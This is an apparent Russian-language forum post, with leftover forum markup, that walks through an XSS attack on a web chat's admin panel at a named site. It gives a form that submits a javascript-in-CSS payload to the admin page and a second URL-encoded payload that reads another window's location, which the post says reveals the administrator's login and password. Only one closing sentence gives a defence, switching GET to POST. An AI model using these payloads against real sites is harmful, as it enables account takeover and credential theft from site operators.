код для теста xss
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><form action="http://mpchat.com/_admin.php" target="_blank">
<textarea cols="50" rows="5" name="chat" id="chat">z style=`background:url(javascript:alert())`</textarea><br>
<input type="submit">
</form>[/QUOTE]<span id='postcolor'>

птом открыть админку и открыть чтарницу с этим кодом, птом заменить в поле alert() на
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">document.write(unescape(/%3Cimg%20src=%22javascript:z=window.open(%27%27,%2 7administration%27)%3Balert(z.document.location)%3 B%22%3E/))[/QUOTE]<span id='postcolor'>

и послать форму и откроется страница с xss иньекцией которая обратится в окно с именем administration и даст url с логином и пассвордом.

Что бы обезопасить свой чат нужно метод get сменить на post, тогда в админке url не будет состоять из логина и пассворда.